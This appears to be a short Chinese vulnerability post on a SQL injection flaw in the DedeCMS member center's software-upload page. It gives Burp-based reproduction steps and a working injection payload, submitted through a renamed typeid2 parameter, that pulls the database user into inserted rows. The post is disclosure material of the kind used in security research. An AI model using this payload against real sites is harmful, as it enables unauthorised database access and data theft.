Dedecms 会员中心注入漏洞6

文章目录

漏洞作者: Matt

[/crayon]

漏洞证明:

调用的地方比较多 我就不一一写出了

测试方法

打开http://127.0.0.1/dede/member/soft_add.php

添加软件

然后打开BURP抓包

讲picnum改成typeid2

然后参数写5′,1,1,1,@'),(‘-1′,’7’,user() , ‘3’,’1389688643′, ‘1389688643’, ‘8’),(1,2,’

就能看到注入结果了

1416543601d8adea882ab89cdc3004a601d2bdd9

 

14165442cdc87135063259862b0ae9c480c3476c

 

14165451be776b3e8c8e8967117de3a255a894ee

原文链接:,转发请注明来源!

发表评论

要发表评论,您必须先登录